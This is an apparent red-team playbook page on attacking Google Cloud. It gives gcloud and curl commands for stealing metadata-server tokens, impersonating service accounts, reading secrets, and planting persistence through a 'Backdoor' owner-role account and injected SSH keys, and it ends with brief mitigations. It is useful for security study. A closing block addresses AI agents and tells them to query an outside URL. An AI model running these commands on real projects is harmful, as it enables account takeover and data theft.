# GCP

### 1. GCP Cloud Overview

#### Core Components

* **Google Cloud IAM** – Identity and Access Management (users, service accounts, roles, policies).
* **Projects** – Organizational units that contain resources.
* **Service Accounts** – Identities for workloads (VMs, functions, apps).
* **Cloud Resource Hierarchy** – Org → Folders → Projects → Resources.

#### Planes of Access

* **Control Plane** – Google Cloud Console, Cloud SDK (`gcloud`), REST APIs.
* **Data Plane** – Actual workloads (VMs, buckets, databases).

🔑 **Security Insight**:

* Compromise of Control Plane creds = full takeover.
* Compromise of Service Account = privilege within project scope (but often escalatable).

***

### 2. Authentication & Credential Types

#### 2.1 User Accounts

* Human users with Google identities (`user@gmail.com`, `user@corp.com`).

#### 2.2 Service Accounts

* Non-human principals for apps/VMs.
* Auth via JSON key files or **Metadata Server**.

#### 2.3 Access Tokens

* OAuth2 bearer tokens (short-lived).
* Commonly abused via SSRF → metadata server.

**Get token inside VM**

```bash
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
```

***

### 3. Enumeration

#### 3.1 Identity Enumeration

Check current active account:

```bash
gcloud auth list
```

Get project ID:

```bash
gcloud config get-value project
```

List IAM policy for a project:

```bash
gcloud projects get-iam-policy <project-id> --format=json
```

Find specific service account roles:

```bash
gcloud projects get-iam-policy <project-id> --format=json \
  | jq '.bindings[] | select(.members[] | contains("serviceAccount:dev-sa@<project>.iam.gserviceaccount.com")) | .role'
```

***

#### 3.2 Service Account Enumeration

List all service accounts in a project:

```bash
gcloud iam service-accounts list --project <project-id>
```

Get details about a service account:

```bash
gcloud iam service-accounts describe <sa-name>@<project>.iam.gserviceaccount.com
```

List keys associated with a service account:

```bash
gcloud iam service-accounts keys list --iam-account <sa-name>@<project>.iam.gserviceaccount.com
```

***

#### 3.3 Storage Enumeration

List storage buckets:

```bash
gcloud storage buckets list --project <project-id>
```

List objects in a bucket:

```bash
gcloud storage objects list gs://<bucket-name>
```

Download file from bucket:

```bash
gcloud storage cp gs://<bucket-name>/<object> ./localfile
```

***

### 4. Exploitation

#### 4.1 Metadata Service Abuse (IMDS Equivalent)

Inside a VM, access metadata endpoint:

```bash
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
```

Use the token to authenticate:

```bash
export ACCESS_TOKEN=$(curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google" | jq -r .access_token)

gcloud auth activate-access-token $ACCESS_TOKEN
```

***

#### 4.2 Using Leaked Tokens

If attacker has a token (e.g., from logs, SSRF):

```bash
echo "<token>" > token.txt
gcloud auth activate-access-token $(cat token.txt)
```

Example (from CTF-like scenario):

```bash
gcloud projects get-iam-policy <project-id> --format=json --access-token-file token.txt
```

***

#### 4.3 Privilege Escalation via Service Accounts

If SA has roles like `roles/iam.serviceAccountUser` or `roles/editor`, attacker can impersonate or escalate:

```bash
gcloud auth print-access-token --impersonate-service-account=<target-sa>@<project>.iam.gserviceaccount.com
```

***

### 5. Post-Exploitation

#### 5.1 Key Vaults / Secrets

If Cloud KMS or Secret Manager accessible:

```bash
gcloud secrets list --project <project-id>
gcloud secrets versions access latest --secret=<secret-name> --project <project-id>
```

#### 5.2 BigQuery Data Dumping

```bash
gcloud bigquery datasets list --project <project-id>
gcloud bigquery tables list --dataset_id <dataset>
gcloud bigquery tables describe <dataset>.<table>
```

***

### 6. Lateral Movement

* Use compromised service account to pivot into other projects.
* Enumerate organization-level roles:

```bash
gcloud organizations get-iam-policy <org-id> --format=json
```

* Abuse roles like `roles/resourcemanager.folderViewer`, `roles/resourcemanager.projectMover` for movement.

***

### 7. Persistence

* Create new service account and assign roles:

```bash
gcloud iam service-accounts create attacker-sa --display-name "Backdoor"
gcloud projects add-iam-policy-binding <project-id> \
  --member="serviceAccount:attacker-sa@<project-id>.iam.gserviceaccount.com" \
  --role="roles/owner"
```

* Add SSH key to compromised VM instance:

```bash
gcloud compute instances add-metadata <vm-name> \
  --metadata ssh-keys="attacker:<public-key>"
```

***

### 8. Detection & Mitigation

* **Monitor IAM policy changes** (Cloud Audit Logs).
* **Restrict service account privileges** (principle of least privilege).
* **Restrict metadata access** (firewall, no public SSRF exposure).
* **Rotate keys/tokens frequently**.
* **Enable VPC Service Controls** to limit lateral movement.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://playbook.sidthoviti.com/cloud-security/gcp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.